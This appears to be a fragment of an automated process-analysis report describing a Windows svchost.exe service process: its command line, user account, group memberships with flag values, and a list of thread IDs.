"C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b580" [0xc000000f], "LOCAL" [0x7] Thread: id = 572 os_tid = 0x548 Thread: id = 573 os_tid = 0x818 Thread: id = 574 os_tid = 0xbf8 Thread: id = 575 os_tid = 0xb84 Thread: id = 576 os_tid = 0x5c4 Thread: id = 577 os_tid = 0x61c Thread: id = 578 os_tid = 0x608 Thread: id = 579 os_tid = 0x600 Thread: id = 580 os_tid = 0x5fc Thread: id = 581 os_tid = 0x5dc Thread: id = 582 os_tid = 0x134 Thread: id = 583 os_tid = 0x174 Thread: id = 584 os_tid = 0x3bc Thread: id = 585 os_tid = 0x3b4 Thread: id = 586 os_tid = 0x3a4 Thread: id = 587 os_tid = 0x304 Thread: id = 588 os_tid = 0x300 Thread: id = 589 os_tid = 0x2d8 Thread: id = 590 os_tid = 0x2d0